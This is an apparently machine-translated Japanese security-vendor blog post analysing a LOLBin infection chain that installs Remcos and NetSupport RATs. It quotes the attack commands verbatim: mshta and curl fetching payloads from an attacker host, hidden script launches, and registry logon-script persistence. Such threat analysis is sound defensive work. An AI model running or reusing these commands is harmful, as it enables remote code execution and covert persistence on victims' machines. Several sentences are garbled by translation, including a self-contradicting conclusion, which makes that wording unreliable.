LOLビンを多用しすぎて、RATを落とすことはできるか?

| 2026年1月21日
二匹のネズミ

最近、私たちのチームは特異な感染試行に遭遇しました。その特徴は高度な技術ではなく、攻撃者が「現地資源活用型」の手法を極限まで追求する執念の度合いでした。

最終目標は、リモートアクセストロイ(RAT)であるRemcosと、正当なリモート管理ツールでありながら頻繁にRATとして悪用されるNetSupport Managerを展開することだった。攻撃者が取ったルートは、Windows組み込みユーティリティ——LOLBins(Living Off the Land Binaries)として知られる手法——を駆使した見事な手法であった。

レムコスとネットサポートは、いずれも悪用が横行しているリモートアクセスツールであり、攻撃者に感染システムに対する広範な制御権を与え、多段階のフィッシングや感染チェーンを通じて配布されることが多い。

レムコス(Remcos、Remote Control & Surveillanceの略称)は、Windows ・監視ツールとして販売されているが、サイバー犯罪者によって広く悪用されている。一度インストールされると、攻撃者に完全なリモートデスクトップアクセス、ファイルシステム制御、コマンド実行、キーロギング、クリップボード監視、永続化オプション、横方向移動のためのトンネリングまたはプロキシ機能を提供する。

NetSupport Managerは正規のリモートサポート製品ですが、攻撃者が不正アクセスを目的としてこれを密かにインストール・設定すると「NetSupport RAT」となります。

この攻撃がどのように展開したかを、ネイティブコマンド一つ一つ追って見ていきましょう。

ステージ1:微妙な初期アクセス

攻撃は一見奇妙なコマンドで始まった:

C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta http://[attacker-ip]/web"

一見すると、こう思うかもしれない:なぜ単に実行しないのか? mshta.exe 直接的に?その答えは防御回避にある。

取り込むことで forfiles.exeファイルのバッチ処理を実行するための正当なツールであるにもかかわらず、攻撃者は意図的に混乱を招いた。これにより、セキュリティツールが実行経路を検知するのがやや困難になる。本質的には、信頼されたプログラムが密かに別のプログラムを起動し、警報を鳴らしにくい連鎖を形成するのだ。

ステージ2:ファイルレスダウンロードとステージング

について mshta コマンドがリモートHTAファイルを取得し、それが直ちに生成した cmd.exe, 複雑なPowerShellワンライナーを展開した:

powershell.exe -NoProfile -Command

curl -s -L -o "<random>.pdf" (attacker-ip}/socket;

mkdir "<random>";

tar -xf "<random>.pdf" -C "<random>";

Invoke-CimMethod Win32_Process Create "<random>\glaxnimate.exe"

これがもたらす効果は以下の通りです:

PowerShellの組み込みcurlが、PDFを装ったペイロードをダウンロードした。実際にはTARアーカイブであった。その後、 tar.exe (別の信頼できるWindows )がランダムな名前のフォルダに解凍した。しかし、この主役は glaxnimate.exe—実行時に感染を拡大させるよう仕組まれた、本物のアニメーションソフトをトロイの木馬化したバージョン。ここでも攻撃者はWindows標準ツールのみに依存しており、EXEドロップツールやマクロは一切使用されていない。

ステージ3:公然と行われる段階

次に何が起きたのか?悪意のあるGlaxnimateのコピーが部分的なファイルを書き始め、 C:\ProgramData:

  • SETUP.CAB.PART
  • PROCESSOR.VBS.PART
  • PATCHER.BAT.PART

なぜ .PART ファイル?これは典型的なマルウェアのステージング手法だ。適切なタイミングが来るまで——あるいはダウンロードが完了するまで——未完成の状態でファイルを配置する。安全が確認できたら、ファイルの名前を変更するか完成させ、次のペイロードを送り込むために利用する。

感染の核心要素をスクリプト化する
感染の核心要素をスクリプト化する

ステージ4:ローンチのスクリプト作成

マルウェアは優れたスクリプトを好む——特に誰の目にも触れないものを。完全に記述されると、Windows Hostが呼び出されVBScriptコンポーネントを実行した:

"C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs"

VBScriptはIWshShell3.Runを使用して、ユーザーに表示せずにプロセスを生成した。 cmd.exe 隠しウィンドウを使用するため、被害者はポップアップや黒いボックスを一切目にすることはない。

IWshShell3.Run("cmd.exe /c %ProgramData%\patcher.bat", "0", "false");

バッチファイルの役割?

expand setup.cab -F:* C:\ProgramData

使用する expand 以前にドロップされたすべてのコンテンツを抽出するユーティリティ setup.cab ProgramDataにアーカイブを保存する—実質的にNetSupport RATとその補助プログラムを展開する。

ステージ5:隠された持続性

攻撃者はツールが再起動後も動作し続けるよう、ステルス性の高いレジストリ経由の手法を選択した:

reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f

従来の「実行」キーとは異なり、 UserInitMprLogonScript 通常の容疑者ではなく、目windowsを開かない。ユーザーがログインするたびに、RATは静かに同行していた。

最終的な所感

この感染チェーンはLOLBin悪用の見本であり、Windowsユーザーに対して悪用することを好む証拠だ。全工程Windows 組み込みWindows に依存している: forfiles, mshta, curl, tarスクリプティングエンジン reg、そして expand.

では、LOLBinsを過剰に使用してRATをドロップすることは可能か?この攻撃者が示すように、答えは「現時点では不可能」だ。しかし追加する手順ごとにノイズが増加し、防御側が追跡できる痕跡も増える。脅威アクターが乱用するツールが増えれば増えるほど、その痕跡はより独自性を持つようになる。

警戒を怠るな。潜在的なLOLBinの悪用を監視せよ。そして決して信用するな。 .pdf 必要な tar.exe 開く。

LOLBinsの多用にもかかわらず、 Malwarebytes は依然としてこの攻撃を検知・ブロックします。攻撃者のIPアドレスをブロックし、システムにドロップされたRemcos RATとNetSupportクライアントの両方を検知しました。

Malwarebytes アドレス79.141.162.189をMalwarebytes

脅威を報告するだけでなく、取り除く

サイバーセキュリティのリスクは、ヘッドラインを超えて広がるべきではありません。今すぐMalwarebytes ダウンロードして、デバイスに脅威を持ち込まないようにしましょう。

著者について

ピーテル・アルンツ

マルウェアインテリジェンス研究者

コンシューマー・セキュリティ部門で12年連続マイクロソフトMVP。4ヶ国語を操る。リッチなマホガニーと革張りの本の匂い。